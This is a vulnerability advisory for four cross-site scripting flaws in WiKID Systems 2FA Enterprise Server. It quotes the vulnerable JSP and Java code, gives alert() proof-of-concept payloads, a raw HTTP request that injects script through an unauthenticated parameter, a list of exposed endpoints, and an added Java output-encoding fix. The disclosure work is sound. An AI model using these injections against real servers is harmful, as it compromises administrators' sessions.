A stored and reflected cross-site scripting vulnerability, CVE-2019-17114, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. The preRegistrationData parameter, used on userPreregistration.jsp, reflects malicious HTML elements contained in an uploaded .csv. The contents of the file are stored and the malicious HTML elements rendered whenever List Pre-Registration is used.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032
The source for userPreregistration.jsp shows values for the pre_registration_code and name columns in the database being retrieved and appended to a string being constructed:
sb.append("</font></td><td style=\"padding: 5px;\"><font face=\"courier\" size=\"-1\">")
.append(rs.getString("pre_registration_code"))
.append("</font></td><td style=\"padding: 5px;\"><font face=\"courier\" size=\"-1\">")
.append(URLDecoder.decode(rs.getString("name"),"UTF-8"))
.append("</font></td></tr>");
The constructed string is then included in the HTML of the page. The values retrieved from the database are not validated or sanitized; consequently, creating a file containing malicious entries such as:
<script>alert(1)</script>,<script>alert(2)</script>
will result in the <script> elements being included in the page, and the JavaScript executes when the file is uploaded.
The malicious name and pre_registration_code are stored and will trigger whenever userPreregistration.jsp?prAction=List+Pre-Registration+Data is visited.
The malicious <script> elements are visible in the page source:
<tr><td colspan="2"><h2>Current Pre-Registration Data</h2></td></tr>
<tr><td><b>UserID</b></td><td><b>Registration Code</b></td><td><b>Domain</b></td></tr>
<tr style="padding: 5px;"><td style="padding: 5px;"><font face="courier" size="-1"><script>alert(2)</script>
(unregistered)</font>
An unauthenticated stored cross-site scripting vulnerability, CVE-2019-17115, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. Submitting invalid values through one of the affected parameters will cause an error to be logged and stored as a rendered_message; the malicious value is retrieved and displayed through Logs.jsp. The error messages are severe enough to be displayed by default.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032
The source for Logs.jsp reveals that values from the rendered_message column are included, unsanitized, in a string which is constructed and included in the HTML for Logs.jsp:
sb.append("<TD class=\"logTableCell\" style=\"white-space:normal;\">")
.append("<a href='./Log.jsp?subString=" + rs.getString("rendered_message") + "'>")
.append("<img src='./images/toolFilter.png' alt='' border=\"0px\" width=\"15px\" height=\"15px\"/></a>")
.append(rs.getString("rendered_message").replaceAll("<", "&lt;").replaceAll(">", "&gt;"))
.append("</TD>");
wikid-server-enterprise-lib-4.2.0.jar reveals several instances where parameters are read and passed to the logger. One example can be found in com.wikidsystems.server.InitDevice5AES:
try {
    requestAction = Integer.parseInt(request.getParameter("a"));
    logger.debug("Determined requested action: " + requestAction);
}
catch (NumberFormatException nfe) {
    nfe.printStackTrace();
    logger.error("IO error during registration -- recieved action: " + request.getParameter("a"), nfe);
}
A non-integer value for a will trigger an error and drop into the catch block; the a parameter is then included in the message passed to logger with the severity of error.
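As an added example (not WiKID's code), the following Java class places the Logs.jsp row construction from the decompiled source beside a version that encodes for each output context; the same per-context encoding applies to the userPreregistration.jsp, groups.jsp and adm_usrs.jsp sinks. The class name, the helper methods and the sample rendered_message are constructed for illustration and assume Java 10 or later.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Added example (not WiKID code): the Logs.jsp row-building pattern beside an
// output-encoded version. RENDERED_MESSAGE is a constructed sample shaped like
// the message InitDevice5AES logs when "a" is not an integer. Needs Java 10+.
public class LogRowEncoding {
    static final String RENDERED_MESSAGE =
        "IO error during registration -- recieved action: "
        + "test'><script>alert('InitDevice5AES - A')</script><!--";
    // Mirrors the original: the text node is escaped, but the same value is
    // dropped raw into a single-quoted href, so a ' closes the attribute.
    static String vulnerableRow(String msg) {
        return "<TD class=\"logTableCell\">"
            + "<a href='./Log.jsp?subString=" + msg + "'>"
            + "<img src='./images/toolFilter.png' alt=''/></a>"
            + msg.replaceAll("<", "&lt;").replaceAll(">", "&gt;")
            + "</TD>";
    }
    // Encode per context: URL-encode the query value, HTML-escape the whole
    // attribute, and HTML-escape the text node separately.
    static String hardenedRow(String msg) {
        String query = URLEncoder.encode(msg, StandardCharsets.UTF_8);
        return "<TD class=\"logTableCell\">"
            + "<a href=\"./Log.jsp?subString=" + escapeHtml(query) + "\">"
            + "<img src=\"./images/toolFilter.png\" alt=\"\"/></a>"
            + escapeHtml(msg)
            + "</TD>";
    }
    // Minimal escaper for text nodes and double-quoted attribute values.
    static String escapeHtml(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&': sb.append("&amp;"); break;
                case '<': sb.append("&lt;"); break;
                case '>': sb.append("&gt;"); break;
                case '"': sb.append("&quot;"); break;
                case '\'': sb.append("&#39;"); break;
                default: sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        System.out.println(vulnerableRow(RENDERED_MESSAGE)); // <script> lands inside the href
        System.out.println(hardenedRow(RENDERED_MESSAGE));   // rendered as inert text
    }
}
```

The first line of output reproduces the broken-out href seen in the page source below; in the second, the quote and angle brackets reach the browser only as %27, %3C and &lt;.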
The following request submits an HTML <script> element as the value for a:
POST /wikid/servlet/com.wikidsystems.server.InitDevice5AES HTTP/1.1
Host: $RHOST
User-Agent: WiKID J2ME Token
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Payload: dGVzdA==
Connection: close
Upgrade-Insecure-Requests: 1=
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
S=1&a=test'><script>alert('InitDevice5AES - A')</script><!--
The JavaScript is executed whenever Log.jsp is visited. The malicious <script> is visible in the page source:
<a href="./Log.jsp?subString=IO error during registration phase 1 -- recieved action: test
"><script>alert('InitDevice5AES - A')</script><!--
'><img src='./images/toolFilter.png' alt=''
The following parameters and endpoints are known to be vulnerable and do not require authentication:
(1) H parameter
- /wikid/servlet/com.wikidsystems.server.GetDomainHash
(2) S parameter
- /wikid/DomainData
- /wikid/PreRegisterLookup
- /wikid/PreRegister
- /wikid/InitDevice
- /wikid/servlet/InitDevice2S
- /wikid/servlet/InitDevice3S
- /servlet/com.wikidsystems.server.InitDevice2S
- /servlet/com.wikidsystems.server.InitDevice3S
- /servlet/com.wikidsystems.server.InitDevice4S
- /wikid/servlet/com.wikidsystems.server.InitDevice4AES
- /wikid/servlet/com.wikidsystems.server.InitDevice5AES
(3) a parameter
- /wikid/PreRegisterLookup
- /wikid/InitDevice
- /wikid/servlet/InitDevice2S
- /wikid/servlet/InitDevice3S
- /servlet/com.wikidsystems.server.InitDevice2S
- /servlet/com.wikidsystems.server.InitDevice3S
- /servlet/com.wikidsystems.server.InitDevice4S
- /wikid/servlet/com.wikidsystems.server.InitDevice4AES
- /wikid/servlet/com.wikidsystems.server.InitDevice5AES
A stored and reflected cross-site scripting vulnerability, CVE-2019-17116, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. The groupName parameter, used on groups.jsp, reflects malicious HTML submitted as New Group. The malicious elements are stored and rendered whenever groups.jsp is visited.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032
When a value like test<script>alert(1)</script> is used for New Group, the <script> element is included in the page and the JavaScript triggers immediately. The group name is stored by the application; the JavaScript triggers whenever groups.jsp is visited.
A stored and reflected cross-site scripting vulnerability, CVE-2019-17120, was identified on WiKID Systems 2FA Enterprise Server version 4.2.0-b2047 and earlier. The usr parameter, used by adm_usrs.jsp, reflects malicious HTML elements entered as the Username for a new admin. The malicious HTML elements are rendered whenever the Administrator Management Page is visited.
WiKID Systems 2FA Enterprise Server 4.2.0-b2032
When an admin user is created with a name containing HTML elements like test<script>alert(1)</script>, the element is included in the page; in this instance the JavaScript triggers immediately. The malicious username is stored and appears in the list of admin users; the JavaScript triggers whenever adm_usrs.jsp is visited.